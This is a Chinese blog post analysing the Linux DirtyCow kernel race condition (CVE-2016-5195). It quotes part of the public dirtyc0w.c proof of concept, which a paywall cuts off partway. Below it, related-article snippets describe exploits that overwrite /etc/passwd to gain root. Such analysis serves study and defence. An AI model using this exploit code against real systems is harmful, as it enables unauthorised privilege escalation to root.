DirtyCow CVE-2016-5195分析

最新推荐文章于 2024-01-20 16:59:44 发布
最新推荐文章于 2024-01-20 16:59:44 发布
阅读量1.4k 收藏 1
点赞数
文章标签: dirtycow linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cui841923894/article/details/81513995
版权

概述

DirtyCow漏洞算是2016年linux社区一件大事情了,通过此漏洞,非授权用户可以写入任意文件,进一步提升权限。漏洞触发简单,涉及众多的linux版本和平台(linux2.6.22及其以上,涉及redhat,ubuntu,suse等多多平台)。
简单来说,CVE-2016-5195漏洞原理是linux内核内存子系统在处理私有的只读存储映射时,触发里面的竞争条件导致获取文件可写入权限,从而可以进一步获取更大的权限。

触发

触发代码:https://github.com/dirtycow/dirtycow.github.io/blob/master/dirtyc0w.c

/*
####################### dirtyc0w.c #######################
$ sudo -s
# echo this is not a test > foo
# chmod 0404 foo
$ ls -lah foo
-r-----r-- 1 root root 19 Oct 20 15:23 foo
$ cat foo
this is not a test
$ gcc -lpthread dirtyc0w.c -o dirtyc0w
$ ./dirtyc0w foo m00000000000000000
mmap 56123000
madvise 0
procselfmem 1800000000
$ cat foo
m00000000000000000
####################### dirtyc0w.c #######################
*/
#include <stdio.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <string.h>

void *map;
int f;
struct stat st;
char *name;

void *madviseThread(void *arg)
{
  char *str;
  str=(char*)arg;
  int i,c=0;
  for(i=0;i<100000000;i++)
  {
/*
You have to race madvise(MADV_DONTNEED) :: https://access.redhat.com/secu ... 06661
> This is achieved by racing the madvise(MADV_DONTNEED) system call
> while having the page of the executable mmapped in memory.
*/
    c+=madvise(map,100,MADV_DONTNEED);
  }
  printf("madvise %d\n\n",c);
}

void *procselfmemThread(void *arg)
{
  char *str;
  str=(char*)arg;
/*
You have
最低0.47元/天 解锁文章
hello小崔
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
linux本地内核提权漏洞 Dirty COW 成因分析
softgmx的博客
03-31 1万+
关于“Dirty COW" 的影响,这方面的文章网上写的太多了,但是关于此漏洞真实成因的文章却很缺乏,基于此,我写了这篇文章,希望对想深入研究的人一些帮助。脏牛漏洞核心成因: 基于下面的POC来讲,要篡改的特权文件在被只读映射后,攻击者第一次发起wite=&gt;mem_write=&gt;get_user_pages=&gt;faultin_page调用后已经去掉了...
DirtyCow提权漏洞复现(CVE-2016-5195)1
08-08
脏牛(Dirty Cow)漏洞,全称为“竞争条件写入时复制”(Copy-on-Write Race Condition),在2016年被发现,其安全漏洞编号为CVE-2016-5195。这个漏洞主要影响的是Linux内核,特别是从2007年的2.6.22版本到修复前的...
CVE-2016-5195
weixin_33813128的博客
09-28 140
TODO:分析脏牛的exp 学习条件竞争漏洞 https://github.com/hyln9/VIKIROOT https://github.com/matteoserva/dirtycow-arm32 https://github.com/timwr/CVE-2016-5195 http://blog.csdn.net/trap0d/article/...
CVE-2016-5195 Dirty-cow 简单分析
zerooffdate的专栏
08-11 717
CVE-2016-5195 Dirty-cow 简单分析这个漏洞是去年爆出来的一个linux跨权限写漏洞,基本表现为一个普通用户能直接写root用户持有的文件。
悬镜安全实验室丨DirtyCow Linux权限提升漏洞分析CVE-2016-5195
Anprou的博客
11-14 1575
悬镜安全实验室原创文章,如需转载,请联系小编。首发平台:悬镜官网。
【漏洞复现】CVE-2016-5195 DirtyCow 脏牛提权
做自己喜欢的事,并将其发挥到极致!
03-10 7763
文章目录声明一、漏洞原理二、漏洞概述及成因三、漏洞影响范围四、先决条件五、漏洞危害六、本地复现方法一方法二:总结 声明 本文章仅限于漏洞复现和技术学习,切勿用于非法用途,出现任何后果与本人无关 一、漏洞原理 Linux内核的内存子系统在处理写入时复制(copy-on-write, COW)时产生了竞争条件(race condition)。恶意用户可利用此漏洞,来获取高权限,对只读内存映射进行写访问。(A race condition was found in the way the Linux kern
CVE-2016-3720
02-22
这个项目是CVE-2016-3720 Demo,为了避免搭建环境,大佬们可以直接获取到这个资源。 相对应的分析文章是:https://blog.csdn.net/qq_36869808 可以在这篇文章看到分析的内容,感谢~当然如果非常需要这个资源,也...
CVE-2016-5195:CVE-2016-5195漏洞利用示例
05-10
dcow是漏洞CVE-2016-5195的可能利用。 在易受攻击的系统上以无特权的用户身份运行该程序,它将修改/ etc / passwd文件,并强制输入密码“ dirtyCowFun”(SHA-512,但可以针对较旧的标准进行修改)。 如果成功执行...
CVE-2016-8655 Linux内核提权漏洞POC
11-18
CVE-2016-8655 Linux内核提权漏洞POC
Linux提权—脏牛漏洞(CVE-2016-5195)
热门推荐
谢公子的博客
07-25 3万+
目录 脏牛漏洞 exp1复现: exp2复现: 脏牛漏洞 脏牛漏洞,又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞。Linux kernel团队在2016年10月18日已经对此进行了修复。 漏洞范围:Linux内核 >= 2.6.22(2007年发行,到2016年10月18日才修复) 简要分析:该漏洞具体...
漏洞复现- - -CVE-2016-5195 Dirty Cow脏牛提权漏洞
weixin_67503304的博客
11-02 4599
本文主要讲解了脏牛漏洞的提全过程及其修复建议。
dirtycow 脏牛漏洞复现 (CVE-2016-5195)
box
10-29 1025
漏洞描述: 漏洞编号:CVE-2016-5195 漏洞名称:脏牛(Dirty COW) 漏洞危害:低权限用户利用该漏洞技术可以在全版本Linux系统上实现本地提权 影响范围:Linux内核>=2.6.22(2007年发行)开始就受影响了,直到2016年10月18日才修复。 360 Vulpecker Team:Android 7.0最新的10月补丁...
2016年最火最牛的内存漏洞分析-dirtycow
奔跑吧-Linux内核
10-29 2941
2016年10月发现一个存在了将近有十年之久的非常严重的安全漏洞,该漏洞可以让低权限的用户利用内存写时复制机制的缺陷来提升自己的系统权限,从而获取root权限,这样黑客可以利用该漏洞入侵服务器,现在大部分的服务器都跑着linux系统。这个漏洞被称为Dirty COW,代号为CVE-2016-5195Linux内核社区在10月18日紧急修复了这个历史久远的bug,各大发型版Linux发布紧急更新公
linux提权之dirtycow
最新发布
qq_62370574的博客
01-20 1045
漏洞是一种影响Linux操作系统的本地特权升级漏洞,其全称为"Copy-On-Write"(写时复制)漏洞。这个漏洞在2016年被公开,并且影响了大量的Linux内核版本。Dirty COW漏洞的根本原因是在Linux在竞态条件下的机制的实现存在缺陷。Copy-On-Write是一种内存管理技术,它允许多个进程共享同一个物理内存页面的副本,直到其中一个进程尝试修改该页面时,系统才会复制出一个新的页面供修改进程使用。是多个并发操作或线程访问共享资源时可能出现的一种问题。
脏牛(Dirty COW)漏洞攻击实验(SEED-Lab:Dirty-COW Attack Lab)
CTFwp笔记1-rsa基本知识+共模攻击
08-30 2547
​   该漏洞是Linux的一个本地提权漏洞,发现者是Phil Oester,影响>=2.6.22的所有Linux内核版本,修复时间是2016年10月18号。该漏洞是 Linux Kernel 中的条件竞争漏洞,攻击者可以利用 Linux kernel 中的 COW(Copy-on-Write)机制存在的逻辑漏洞,完成对文件的越权读写。............
dirty cow的一点理解
qq_39108061的博客
07-30 239
利用安全* 基线安全 每一个进程都有一个页表 dirty cow触发过程jian 获取4次页面 第一次 调页,填页表,只读映射cow,更新页表项 第二次 要求写foll_write=1,不让写,判断cow存在和不可写->只读内存,foll_write=0 第三次 寻页,可以写cow的页,开线程2,madvise() 页表项置空->缺页,调页,不需要写权限foll_write=0->不会cow 第四次 写操作同步到只读文件中(越权) 上读下写 ...
脏牛(Dirty Cow)快速指南
weixin_34061555的博客
11-09 2594
什么是DirtyCow 脏牛(Dirty Cow)是Linux内核的一个提权漏洞,攻击者可以利用这个漏洞获取root权限。之所以叫Dirty Cow,因为这个漏洞利用了Linux的copy-on-write机制。脏牛的CVE编号是CVE-2016-5195。 怎么判断我的系统是不是受影响 脏牛的影响范围很大,几乎涵盖了主流的Linux发行版。要判断系统是...
Linux核心再修补了安全漏洞 DirtyCOW修补不完全
自在过生活
12-05 704
尽管DirtyCOW已被修补一年,但资安业者Bindecy发现修补并不完全,第三方在未授权下可写入只读页面,影响应用程序表现,受影响版本包括Ubuntu、Fedora、SUSE等,Android及Red Hat则未受影响。 在Linux重大安全漏洞—DirtyCOWCVE-20165195)被修补的一年之后,资安业者Bindecy发现该修补程序并不完全,使得Linux核心的首席开
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

hello小崔

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值